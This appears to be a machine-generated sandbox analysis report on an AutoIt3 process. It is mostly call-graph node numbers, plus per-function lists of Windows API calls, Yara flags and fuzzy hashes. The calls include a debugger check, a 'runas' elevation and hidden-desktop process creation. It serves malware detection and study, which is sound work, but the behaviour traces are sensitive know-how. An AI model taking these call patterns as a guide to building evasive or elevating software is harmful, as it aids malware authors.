142068->142069 142072 831181 142069->142072 142073 83119c 142069->142073 142070 835e9b __write_nolock 58 API calls 142074 83126a 142070->142074 142071->142070 142075 828d58 __wsplitpath_helper 58 API calls 142072->142075 142077 831af1 __lseeki64_nolock 60 API calls 142073->142077 142076 8312e3 ReadFile 142074->142076 142081 831280 GetConsoleMode 142074->142081 142078 831186 142075->142078 142079 8317c3 GetLastError 142076->142079 142080 831305 142076->142080 142077->142071 142082 828d24 __write_nolock 58 API calls 142078->142082 142083 8317d0 142079->142083 142084 8312c3 142079->142084 142080->142079 142088 8312d5 142080->142088 142085 8312e0 142081->142085 142086 831294 142081->142086 142082->142094 142087 828d58 __wsplitpath_helper 58 API calls 142083->142087 142092 828d37 __dosmaperr 58 API calls 142084->142092 142096 8312c9 142084->142096 142085->142076 142086->142085 142089 83129a ReadConsoleW 142086->142089 142090 8317d5 142087->142090 142088->142096 142097 83133a 142088->142097 142107 8315a7 142088->142107 142089->142088 142091 8312bd GetLastError 142089->142091 142093 828d24 __write_nolock 58 API calls 142090->142093 142091->142084 142092->142096 142093->142096 142094->142038 142095 822f85 _free 58 API calls 142095->142094 142096->142094 142096->142095 142098 8313a6 ReadFile 142097->142098 142104 831427 142097->142104 142101 8313c7 GetLastError 142098->142101 142105 8313d1 142098->142105 142100 8316ad ReadFile 142108 8316d0 GetLastError 142100->142108 142113 8316de 142100->142113 142101->142105 142102 8314e4 142109 831af1 __lseeki64_nolock 60 API calls 142102->142109 142110 831494 MultiByteToWideChar 142102->142110 142103 8314d4 142106 828d58 __wsplitpath_helper 58 API calls 142103->142106 142104->142096 142104->142102 142104->142103 142104->142110 142105->142097 142111 831af1 __lseeki64_nolock 60 API calls 142105->142111 142106->142096 142107->142096 142107->142100 142108->142113 142109->142110 142110->142091 142110->142096 142111->142105 142112 831af1 
__lseeki64_nolock 60 API calls 142112->142113 142113->142107 142113->142112 142115 830de2 142114->142115 142118 830df7 142114->142118 142116 828d58 __wsplitpath_helper 58 API calls 142115->142116 142117 830de7 142116->142117 142119 828fe6 __wsplitpath_helper 9 API calls 142117->142119 142120 830e2c 142118->142120 142121 836214 __getbuf 58 API calls 142118->142121 142125 830df2 142118->142125 142119->142125 142122 824906 __fputwc_nolock 58 API calls 142120->142122 142121->142120 142123 830e40 142122->142123 142124 830f77 __read 72 API calls 142123->142124 142126 830e47 142124->142126 142125->142038 142126->142125 142127 824906 __fputwc_nolock 58 API calls 142126->142127 142128 830e6a 142127->142128 142128->142125 142129 824906 __fputwc_nolock 58 API calls 142128->142129 142130 830e76 142129->142130 142130->142125 142131 824906 __fputwc_nolock 58 API calls 142130->142131 142132 830e83 142131->142132 142133 824906 __fputwc_nolock 58 API calls 142132->142133 142133->142125 142134->142032 142135->142035 142136->142038 142137->142032 142141 82542a GetSystemTimeAsFileTime 142138->142141 142140 869529 142140->141803 142142 825458 __aulldiv 142141->142142 142142->142140 142144 825e8c __ioinit 142143->142144 142145 825eb3 142144->142145 142146 825e9e 142144->142146 142148 826e3e __lock_file 59 API calls 142145->142148 142156 828d58 58 API calls __getptd_noexit 142146->142156 142150 825eb9 142148->142150 142149 825ea3 142157 828fe6 9 API calls __wsplitpath_helper 142149->142157 142152 825af0 __ftell_nolock 67 API calls 142150->142152 142153 825ec4 142152->142153 142158 825ee4 LeaveCriticalSection LeaveCriticalSection __wfsopen 142153->142158 142155 825eae __ioinit 142155->141808 142156->142149 142157->142155 142158->142155 142164->141614 142165->141616 142181->141613 142182->141620 142198 869d05 __tzset_nolock _wcscmp 142193->142198 142194 814ab2 74 API calls 142194->142198 142195 869b99 142195->141705 142195->141733 142196 8696c4 GetSystemTimeAsFileTime 142196->142198 142197 
814a8c 85 API calls 142197->142198 142198->142194 142198->142195 142198->142196 142198->142197 142622 814d83 142623 814dba 142622->142623 142624 814e37 142623->142624 142625 814dd8 142623->142625 142662 814e35 142623->142662 142627 8509c2 142624->142627 142628 814e3d 142624->142628 142629 814de5 142625->142629 142630 814ead PostQuitMessage 142625->142630 142626 814e1a DefWindowProcW 142664 814e28 142626->142664 142672 80c460 10 API calls Mailbox 142627->142672 142632 814e42 142628->142632 142633 814e65 SetTimer RegisterWindowMessageW 142628->142633 142634 850a35 142629->142634 142635 814df0 142629->142635 142630->142664 142638 850965 142632->142638 142639 814e49 KillTimer 142632->142639 142640 814e8e CreatePopupMenu 142633->142640 142633->142664 142677 862cce 97 API calls _memset 142634->142677 142641 814eb7 142635->142641 142642 814df8 142635->142642 142637 8509e9 142673 80c483 317 API calls Mailbox 142637->142673 142648 85099e MoveWindow 142638->142648 142649 85096a 142638->142649 142667 815ac3 Shell_NotifyIconW _memset 142639->142667 142640->142664 142670 815b29 90 API calls _memset 142641->142670 142643 814e03 142642->142643 142644 850a1a 142642->142644 142651 814e9b 142643->142651 142652 814e0e 142643->142652 142644->142626 142676 858854 59 API calls Mailbox 142644->142676 142645 850a47 142645->142626 142645->142664 142648->142664 142654 85098d SetFocus 142649->142654 142655 85096e 142649->142655 142669 815bd7 107 API calls _memset 142651->142669 142652->142626 142674 815ac3 Shell_NotifyIconW _memset 142652->142674 142653 814eab 142653->142664 142654->142664 142655->142652 142658 850977 142655->142658 142656 814e5c 142668 8034e4 DeleteObject DestroyWindow Mailbox 142656->142668 142671 80c460 10 API calls Mailbox 142658->142671 142662->142626 142665 850a0e 142675 8159d3 94 API calls _memset 142665->142675 142667->142656 142668->142664 142669->142653 142670->142653 142671->142664 142672->142637 142673->142652 142674->142665 142675->142662 142676->142662 
[Execution graph residue: the rendered function call graph of the analyzed processes did not survive extraction; only node addresses, edge lists and the API names attached to nodes remain. Windows API calls visible in the graph nodes: LoadLibraryA, LoadLibraryExA, FreeLibrary, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetCommandLineA, GetPEB, VirtualAlloc, CreateProcessW, CreateThread, TerminateProcess, GetCurrentProcess, IsWow64Process, GetVersionExW, GetSystemInfo, GetNativeSystemInfo, CreateFileA, GetFileSize, ReadFile, CloseHandle, GetStdHandle, RegOpenKeyExA, RegOpenKeyExW, RegQueryValueExA, RegQueryValueExW, RegCloseKey, GetThreadLocale, GetLocaleInfoA, LoadStringA, lstrcpyn, lstrlen, CharNextA, CharLowerBuffW, MessageBoxA, DefDlgProcW, GetWindowLongW, GetWindowRect, MoveWindow, PostMessageW, RegisterWindowMessageW, GetForegroundWindow, EnumWindows, ClientToScreen, ImageList_DragMove, IsThemeActive, GetSysColor, SetBkColor, OleInitialize, SysFreeString, LocalAlloc, RtlInitializeCriticalSection, RtlEnterCriticalSection, RtlLeaveCriticalSection. Runtime symbols also labelled on nodes: __cinit, _free, _memmove, _wcsstr, _strcat, _wcscpy, __NMSG_WRITE, __crtLCMapStringA_stat, and a recurring "Mailbox" label.]
145109->145107 145109->145108 145110 11d0fa3 145110->145109 145126 11d0b65 9 API calls 145110->145126 145112->145105 145114 11d09cb 145113->145114 145115 11d09d4 145113->145115 145133 11d015d RtlInitializeCriticalSection RtlEnterCriticalSection LocalAlloc RtlLeaveCriticalSection 145114->145133 145118 11d09fd RtlEnterCriticalSection 145115->145118 145119 11d0a07 145115->145119 145124 11d09dc 145115->145124 145117 11d09d0 145117->145115 145117->145124 145118->145119 145119->145124 145127 11d0871 145119->145127 145122 11d0b4a RtlLeaveCriticalSection 145123 11d0b54 145122->145123 145123->145110 145124->145110 145125->145102 145126->145109 145128 11d0888 145127->145128 145129 11d08c9 145128->145129 145132 11d08f0 145128->145132 145134 11d07d9 145128->145134 145129->145132 145139 11d0609 145129->145139 145132->145122 145132->145123 145133->145117 145143 11cfedd 145134->145143 145136 11d07e9 145137 11d07f6 145136->145137 145152 11d074d 9 API calls 145136->145152 145137->145128 145140 11d062e 145139->145140 145141 11d06a4 145139->145141 145140->145132 145141->145140 145168 11d054d 145141->145168 145146 11cfefb 145143->145146 145144 11cff09 145153 11cfd61 145144->145153 145146->145144 145149 11cff69 145146->145149 145150 11cff17 145146->145150 145157 11cfbbd 145146->145157 145165 11cfa71 LocalAlloc 145146->145165 145166 11cfc99 VirtualFree 145149->145166 145150->145136 145152->145137 145155 11cfdb4 145153->145155 145154 11cfe03 145154->145150 145155->145154 145156 11cfdea VirtualAlloc 145155->145156 145156->145154 145156->145155 145158 11cfbcc VirtualAlloc 145157->145158 145160 11cfc1c 145158->145160 145161 11cfbf9 145158->145161 145160->145146 145167 11cf9e1 LocalAlloc 145161->145167 145163 11cfc05 145163->145160 145164 11cfc09 VirtualFree 145163->145164 145164->145160 145165->145146 145166->145150 145167->145163 145169 11d0561 145168->145169 145170 11d05fd 145169->145170 145171 11d05af 145169->145171 145172 11d0599 145169->145172 145170->145140 145174 11d00c9 3 API calls 
145171->145174 145181 11d00c9 145172->145181 145175 11d05ad 145174->145175 145175->145170 145191 11d040d 9 API calls 145175->145191 145177 11d05d0 145178 11d05f2 145177->145178 145192 11d046d 9 API calls 145177->145192 145193 11cfaf9 LocalAlloc 145178->145193 145182 11d00f3 145181->145182 145183 11d0150 145181->145183 145194 11cfe21 145182->145194 145183->145175 145187 11d0114 145188 11d012b 145187->145188 145199 11cfc99 VirtualFree 145187->145199 145188->145183 145200 11cfaf9 LocalAlloc 145188->145200 145191->145177 145192->145178 145193->145170 145196 11cfe72 145194->145196 145195 11cfed3 145198 11cfa71 LocalAlloc 145195->145198 145196->145195 145197 11cfea4 VirtualFree 145196->145197 145197->145196 145198->145187 145199->145188 145200->145183 145201 80107d 145206 812fc5 145201->145206 145203 80108c 145204 822f70 __cinit 67 API calls 145203->145204 145205 801096 145204->145205 145207 812fd5 __write_nolock 145206->145207 145208 811207 59 API calls 145207->145208 145209 81308b 145208->145209 145210 8200cf 61 API calls 145209->145210 145211 813094 145210->145211 145237 8208c1 145211->145237 145214 811900 59 API calls 145215 8130ad 145214->145215 145216 814c94 59 API calls 145215->145216 145217 8130bc 145216->145217 145218 811207 59 API calls 145217->145218 145219 8130c5 145218->145219 145220 8119e1 59 API calls 145219->145220 145221 8130ce RegOpenKeyExW 145220->145221 145222 8501a3 RegQueryValueExW 145221->145222 145226 8130f0 Mailbox 145221->145226 145223 850235 RegCloseKey 145222->145223 145224 8501c0 145222->145224 145223->145226 145235 850247 _wcscat Mailbox __NMSG_WRITE 145223->145235 145225 820fe6 Mailbox 59 API calls 145224->145225 145227 8501d9 145225->145227 145226->145203 145228 81433f 59 API calls 145227->145228 145229 8501e4 RegQueryValueExW 145228->145229 145230 850201 145229->145230 145232 85021b 145229->145232 145231 811821 59 API calls 145230->145231 145231->145232 145232->145223 145233 811a36 59 API calls 145233->145235 145234 814c94 59 API calls 
145234->145235 145235->145226 145235->145233 145235->145234 145236 811609 59 API calls 145235->145236 145236->145235 145238 831b70 __write_nolock 145237->145238 145239 8208ce GetFullPathNameW 145238->145239 145240 8208f0 145239->145240 145241 811821 59 API calls 145240->145241 145242 81309f 145241->145242 145242->145214

                                      Control-flow Graph

                                      APIs
                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 03CC5C3F
                                      • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 03CC5C5D
                                      • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 03CC5C7B
                                      • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 03CC5C99
                                      • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,03CC5D28,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 03CC5CE2
                                      • RegQueryValueExA.ADVAPI32(?,03CC5EA4,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,03CC5D28,?,80000001), ref: 03CC5D00
                                      • RegCloseKey.ADVAPI32(?,03CC5D2F,00000000,00000000,00000005,00000000,03CC5D28,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 03CC5D22
                                      • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 03CC5D3F
                                      • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105), ref: 03CC5D4C
                                      • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105), ref: 03CC5D52
                                      • lstrlen.KERNEL32(00000000), ref: 03CC5D7D
                                      • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 03CC5DD2
                                      • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 03CC5DE2
                                      • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 03CC5E0E
                                      • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 03CC5E1E
                                      • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 03CC5E48
                                      • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 03CC5E58
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1743157154.0000000003CC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 03CC1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_3cc1000_Autoit3.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                      • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                      • API String ID: 1759228003-2375825460
                                      • Opcode ID: e27a9c02b07d020971cf0dc1afbb756df3a1894eba60258a5acc9fc19b392a2b
                                      • Instruction ID: 419cad0a7ccc4a19e229d74b2b47cc19d7c248578446b4826cfd77fc2eb4215e
                                      • Opcode Fuzzy Hash: e27a9c02b07d020971cf0dc1afbb756df3a1894eba60258a5acc9fc19b392a2b
                                      • Instruction Fuzzy Hash: 16618279E1438D7EEB10DAE5CC45FEFB7BC9B49700F4440A9E604EA182D6B8EA44CB50

                                      Control-flow Graph

                                      APIs
                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 011D312C
                                      • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 011D314A
                                      • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 011D3168
                                      • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 011D3186
                                      • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,011D3215,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 011D31CF
                                      • RegQueryValueExA.ADVAPI32(?,011D3391,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,011D3215,?,80000001), ref: 011D31ED
                                      • RegCloseKey.ADVAPI32(?,011D321C,00000000,00000000,00000005,00000000,011D3215,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 011D320F
                                      • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 011D322C
                                      • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 011D3239
                                      • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 011D323F
                                      • lstrlen.KERNEL32(00000000), ref: 011D326A
                                      • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 011D32BF
                                      • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 011D32CF
                                      • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 011D32FB
                                      • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 011D330B
                                      • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 011D3335
                                      • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 011D3345
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1741961052.00000000011CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 011CD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_11cd000_Autoit3.jbxd
                                      Similarity
                                      • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                      • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                      • API String ID: 1759228003-2375825460
                                      • Opcode ID: 136ee96dba67357bf197ec0ef800fecb354f612b2ded54c2211a37fccea617c9
                                      • Instruction ID: f5aee3ebe7e2bf9c7a92d30571b1f91ad7796afeae27d08d22930b2227fcaaa5
                                      • Opcode Fuzzy Hash: 136ee96dba67357bf197ec0ef800fecb354f612b2ded54c2211a37fccea617c9
                                      • Instruction Fuzzy Hash: F36196B1E0421E7EEB19DAE8CC85FEF77BDBB18704F0040A5A614E6181DBB4DA45CB61

                                      Control-flow Graph

                                      APIs
                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0081526C
                                      • IsDebuggerPresent.KERNEL32 ref: 0081527E
                                      • GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 008152E6
                                        • Part of subcall function 00811821: _memmove.LIBCMT ref: 0081185B
                                        • Part of subcall function 0080BBC6: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0080BC07
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00815366
                                      • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00850B2E
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00850B66
                                      • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,008B6D10), ref: 00850BE9
                                      • ShellExecuteW.SHELL32(00000000), ref: 00850BF0
                                        • Part of subcall function 0081514C: GetSysColorBrush.USER32(0000000F), ref: 00815156
                                        • Part of subcall function 0081514C: LoadCursorW.USER32(00000000,00007F00), ref: 00815165
                                        • Part of subcall function 0081514C: LoadIconW.USER32(00000063), ref: 0081517C
                                        • Part of subcall function 0081514C: LoadIconW.USER32(000000A4), ref: 0081518E
                                        • Part of subcall function 0081514C: LoadIconW.USER32(000000A2), ref: 008151A0
                                        • Part of subcall function 0081514C: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 008151C6
                                        • Part of subcall function 0081514C: RegisterClassExW.USER32(?), ref: 0081521C
                                        • Part of subcall function 008150DB: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00815109
                                        • Part of subcall function 008150DB: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 0081512A
                                        • Part of subcall function 008150DB: ShowWindow.USER32(00000000), ref: 0081513E
                                        • Part of subcall function 008150DB: ShowWindow.USER32(00000000), ref: 00815147
                                        • Part of subcall function 008159D3: _memset.LIBCMT ref: 008159F9
                                        • Part of subcall function 008159D3: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00815A9E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
                                      • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                      • String ID: (m$AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                                      • API String ID: 529118366-1511201690
                                      • Opcode ID: 4160a9d561f2c936a48976a2878befa4f6040f098dec3e3b26b6f3958065a43d
                                      • Instruction ID: 8300ab69b92238e09c93d6f6de62c89295980272c336d2a41a324f9228230c9d
                                      • Opcode Fuzzy Hash: 4160a9d561f2c936a48976a2878befa4f6040f098dec3e3b26b6f3958065a43d
                                      • Instruction Fuzzy Hash: AD51E431944248EECF01ABB8DC4AEEEBB7CFF45341F144069F562E2262DA754588CF22
                                      APIs
                                      • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 03CC5D3F
                                      • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105), ref: 03CC5D4C
                                      • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105), ref: 03CC5D52
                                      • lstrlen.KERNEL32(00000000), ref: 03CC5D7D
                                      • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 03CC5DD2
                                      • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 03CC5DE2
                                      • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 03CC5E0E
                                      • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 03CC5E1E
                                      • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 03CC5E48
                                      • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 03CC5E58
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1743157154.0000000003CC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 03CC1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_3cc1000_Autoit3.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                      • String ID:
                                      • API String ID: 1599918012-0
                                      • Opcode ID: 0344ba86581cdf32a94fb574eaf46c3f73ae3c3a0e213fbf014252a823f15d60
                                      • Instruction ID: 3d56e9e5bc40f6eebc1af7705512a2b8cf031d699ae09d25754a75fb226a7bd6
                                      • Opcode Fuzzy Hash: 0344ba86581cdf32a94fb574eaf46c3f73ae3c3a0e213fbf014252a823f15d60
                                      • Instruction Fuzzy Hash: 87319375E143897EEF11DAF9C884FEFB7BC9B08300F484199E145EA186D6B8EA44CB50

                                      Control-flow Graph

                                      APIs
                                      • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 011D322C
                                      • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 011D3239
                                      • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 011D323F
                                      • lstrlen.KERNEL32(00000000), ref: 011D326A
                                      • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 011D32BF
                                      • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 011D32CF
                                      • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 011D32FB
                                      • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 011D330B
                                      • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 011D3335
                                      • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 011D3345
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1741961052.00000000011CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 011CD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_11cd000_Autoit3.jbxd
                                      Similarity
                                      • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                      • String ID:
                                      • API String ID: 1599918012-0
                                      • Opcode ID: e261d97cc2f5a6aea1d14934ee5f21dfe5313eca4c65cc1ed50e80ae26d9e114
                                      • Instruction ID: 89a1a51a95951bf601ba3d54e4dfe20f283b5630bde939b00fba26f30a10fd49
                                      • Opcode Fuzzy Hash: e261d97cc2f5a6aea1d14934ee5f21dfe5313eca4c65cc1ed50e80ae26d9e114
                                      • Instruction Fuzzy Hash: 963162B1E0421E7EEF19DAECC885FEF77BDAB28704F0040A5A155E2181DBB8DA458B51
                                      APIs
                                      • CreateDesktopA.USER32(00000000,00000000,00000000,00000000,10000000,00000000), ref: 03CF37CE
                                      • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,08008000,00000000,00000000,00000044,?,00000000,03CF38FD,?,?,?), ref: 03CF380F
                                      • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,08008000,00000000,00000000,00000044,?,00000000,00000000,00000000,00000000,000000FF,08008000), ref: 03CF384C
                                      • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,08008000,00000000,00000000,00000044,?,00000000,03CF38FD,?,?,?), ref: 03CF3885
                                      • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,000000FF,08008000,00000000,00000000,00000044,?,00000000,00000000,00000000,00000000,000000FF,08008000), ref: 03CF38BD
                                      • WaitForSingleObject.KERNEL32(?,000000FF,00000000,00000000,00000000,00000000,000000FF,08008000,00000000,00000000,00000044,?,00000000,03CF38FD,?,?), ref: 03CF38D0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1743157154.0000000003CC1000.00000040.00001000.00020000.00000000.sdmp, Offset: 03CC1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_3cc1000_Autoit3.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Create$Process$DesktopObjectSingleWait
                                      • String ID: D
                                      • API String ID: 183768610-2746444292
                                      • Opcode ID: d5ea19be66420c2e07f373c7ba9845047262881f91a2ce5729495edac2d69f66
                                      • Instruction ID: d01a5226007f18289fea9195b320932267326979f32ab13fb6973db8079f6e87
                                      • Opcode Fuzzy Hash: d5ea19be66420c2e07f373c7ba9845047262881f91a2ce5729495edac2d69f66
                                      • Instruction Fuzzy Hash: 4A514B79A50388BEEB11EB95CC81F9EB7B8EF04310F618129E614FB2D0D774AA049B14
                                      APIs
                                      • GetVersionExW.KERNEL32(?), ref: 00815D40
                                        • Part of subcall function 00811821: _memmove.LIBCMT ref: 0081185B
                                      • GetCurrentProcess.KERNEL32(?,00890A18,00000000,00000000,?), ref: 00815E07
                                      • IsWow64Process.KERNEL32(00000000), ref: 00815E0E
                                      • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00815E54
                                      • FreeLibrary.KERNEL32(00000000), ref: 00815E5F
                                      • GetSystemInfo.KERNEL32(00000000), ref: 00815E90
                                      • GetSystemInfo.KERNEL32(00000000), ref: 00815E9C
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1740385519.0000000000801000.00000020.00000001.01000000.00000009.sdmp, Offset: 00800000, based on PE: true
                                      • Associated: 00000003.00000002.1740355672.0000000000800000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.0000000000890000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740468825.00000000008B6000.00000002.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740554053.00000000008C0000.00000004.00000001.01000000.00000009.sdmp
                                      • Associated: 00000003.00000002.1740584762.00000000008C9000.00000002.00000001.01000000.00000009.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_800000_Autoit3.jbxd
                                      Similarity
